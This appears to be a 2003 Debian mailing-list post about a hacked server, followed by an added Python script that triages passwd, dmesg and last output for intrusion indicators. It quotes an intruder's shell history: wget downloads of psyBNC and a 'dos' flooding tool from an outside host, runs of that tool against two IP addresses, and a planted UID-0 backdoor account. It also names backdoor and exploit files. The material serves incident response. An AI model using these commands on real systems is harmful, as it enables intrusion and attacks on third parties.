On Wed, 17 Sep 2003 22:29:58 +0200 Markus Schabel <[EMAIL PROTECTED]> wrote:
I've seen some strange things on my (stable with security updates) server: the last apt-get update didn't work because gzip segfaulted. I copied gzip from another server over the version on this server, but it also crashed. Interesting was that the executable was bigger after the segfault.
curious.
In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no idea where they come from.
it's the daily cronjob that stole.
yes, and that's reproducible :(
You think the server got hacked? Are there any other things that can lead to this? man also behaves strange, it says either "No manual entry for...", "What manual page do you want?" or nothing.
I'm thinking about a hardware problem. Maybe the hard drive is failing (get the output of dmesg) or a very big RAM problem that corrupts files on the hard drive.
request_module[net-pf-14]: waitpid(15400,...) failed, errno 1
ptrace uses obsolete (PF_INET,SOCK_PACKET)
eth0: Promiscuous mode enabled.
device eth0 entered promiscuous mode
eth0: Promiscuous mode enabled.
but nothing about the disks
In any case, simply copy all the data you can and inspect the HDD in another box, mounting it read-only.
setuid.changes lists /dev/* and the following programs: pppd postdrop postqueue wall newgrp at chage chfn chsh expiry gpasswd passwd write crontab dotlockfile ssh-keysign procmail lockfile popauth pt_chown traceroute mount umount login su ping suexec /usr/lib/mc/bin/cons.saver
and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash
in /etc/.rpn there's a .bash_history with the following content:
id
mkdir /etc/.rpn
ps -aux
ps -aux | grep tbk
kill -15292 pid
kill 15292
netconf
locate httpd.conf
cd /etc/.rpn
ls -al
wget
cd /var/www/cncmap/www/upload/renegade
ls -al
rm -rf phpshell.php
cat bd.c
gcc -o bd bd.c
ftp ftp.hpg.com.br
rm -rf bd.c
cd /tmp
cd /etc/.rpn
wget www.slacks.hpg.com.br/psyBNC.tar.gz
tar zvxf psyBNC.tar.gz
tar -zvxf psyBNC.tar.gz
tar
gunzip psyBNC.tar.gz
tar -Acdtrux psyBNC.tar.gz
tar -x psyBNC.tar.gz
tar -Acd psyBNC.tar.gz
tar -cd psyBNC.tar.gz
tar --help
pwd
ls
rm -rf *
wget www.slacks.hpg.com.br/bin/dos
chmod +x dos
./dos
./dos 200.101.87.8 65535 8569
./dos 200.199.95.11 65535 8569
and the executable dos
interesting is the line "tar --help" :D
in "last" I see the following:
slacks pts/0 Sun Sep 14 02:26 - 03:37 (01:11) 200-147-107-35.tlm.dialuol.com.br
The IP of the hacker is 200.147.107.35. I think we have no chance of legal action against .br?
In the directory /var/www/cncmap/www/upload/renegade there are the following files:
backhole.pl
e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003, LES-EXPLOIT for Linux x86")
rem.php (phpRemoteView)
so we got hacked :(
What information should we gather before we reinstall the complete server? I think we have to reinstall the whole thing, or do you have any ideas?
thanks Markus
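The indicators Markus lists above (a second UID-0 account in /etc/passwd, the promiscuous-mode and SOCK_PACKET messages in dmesg, and the `last` entry for that account) can be checked mechanically from copies of the files, which fits the advice to pull the data off the box and examine it elsewhere. The script below is an added example written for this page in Python; it is not part of the thread and not a Debian or checksecurity tool. Its sample inputs are constructed for the example, apart from the slacks passwd line, the dmesg fragment and the first `last` line, which are copied from the thread; the `last` parser assumes the user is the first token and the remote host the last token on each line, as in the quoted line.

```python
"""Offline triage of the three indicators discussed in the thread: an extra
UID-0 account in /etc/passwd, sniffer traces in dmesg, and logins by that
account in `last` output.  Added example, not code from the thread or from
Debian; run it on copies of the files pulled off the suspect disk."""
import re
from typing import Dict, List, Set, Tuple

# Constructed sample input.  Only the slacks line, the dmesg fragment and the
# first `last` line come from the thread; the rest is made up for the example.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
markus:x:1000:1000:Markus Schabel:/home/markus:/bin/bash
slacks:x:0:0::/etc/.rpn:/bin/bash
"""
SAMPLE_DMESG = """\
request_module[net-pf-14]: waitpid(15400,...) failed, errno 1
ptrace uses obsolete (PF_INET,SOCK_PACKET)
eth0: Promiscuous mode enabled.
device eth0 entered promiscuous mode
eth0: Promiscuous mode enabled.
"""
SAMPLE_LAST = """\
slacks   pts/0        Sun Sep 14 02:26 - 03:37  (01:11)     200-147-107-35.tlm.dialuol.com.br
markus   pts/1        Wed Sep 17 21:50   still logged in    192.0.2.10
reboot   system boot  Mon Sep  1 08:00                      2.4.18-bf2.4

wtmp begins Mon Sep  1 08:00:00 2003
"""


def extra_uid0_accounts(passwd_text: str) -> List[Dict[str, object]]:
    """Every UID-0 passwd entry other than the first 'root' line.

    A second UID-0 entry is a classic backdoor account; a home directory whose
    last component starts with '.' (such as /etc/.rpn) is flagged as hidden."""
    hits: List[Dict[str, object]] = []
    seen_root = False
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:          # blank or malformed line
            continue
        name, _pw, uid, gid, _gecos, home, shell = fields
        if uid != "0":
            continue
        if name == "root" and not seen_root:
            seen_root = True          # the one legitimate UID-0 entry
            continue
        hidden = home.rstrip("/").rsplit("/", 1)[-1].startswith(".")
        hits.append({"name": name, "gid": gid, "home": home,
                     "shell": shell, "hidden_home": hidden})
    return hits


PROMISC_RE = re.compile(r"device (\S+) entered promiscuous mode")
SOCK_PACKET_RE = re.compile(r"^(\S+) uses obsolete \(PF_INET,SOCK_PACKET\)", re.M)


def promiscuous_interfaces(dmesg_text: str) -> List[str]:
    """Interfaces the kernel reported switching to promiscuous mode."""
    return sorted({m.group(1) for m in PROMISC_RE.finditer(dmesg_text)})


def packet_socket_users(dmesg_text: str) -> List[str]:
    """Process names that opened a legacy SOCK_PACKET raw socket.  The kernel
    logs the calling process's comm, so the name survives even if the binary
    has since been deleted."""
    return sorted({m.group(1) for m in SOCK_PACKET_RE.finditer(dmesg_text)})


def sessions_for(last_text: str, users: Set[str]) -> List[Tuple[str, str, str]]:
    """(user, tty, host) for each `last` line belonging to one of `users`.
    Assumes user first, tty second, remote host as the final token."""
    sessions = []
    for line in last_text.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0] == "wtmp":   # trailer or blank line
            continue
        if fields[0] in users:
            sessions.append((fields[0], fields[1], fields[-1]))
    return sessions


def triage(passwd_text: str, dmesg_text: str, last_text: str) -> Dict[str, object]:
    """Combine the three checks into one report for the incident notes."""
    accounts = extra_uid0_accounts(passwd_text)
    names = {str(a["name"]) for a in accounts}
    report: Dict[str, object] = {
        "extra_uid0": accounts,
        "promiscuous": promiscuous_interfaces(dmesg_text),
        "packet_socket_users": packet_socket_users(dmesg_text),
        "sessions": sessions_for(last_text, names),
    }
    report["indicators_present"] = bool(accounts) or bool(report["promiscuous"])
    return report


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_PASSWD, SAMPLE_DMESG, SAMPLE_LAST), indent=2))
```

Point it at the real files with something like `triage(open("passwd").read(), open("dmesg.txt").read(), open("last.txt").read())` after copying them from the read-only mounted disk; the report is what you would want to keep with the setuid.changes output and the .bash_history before the reinstall.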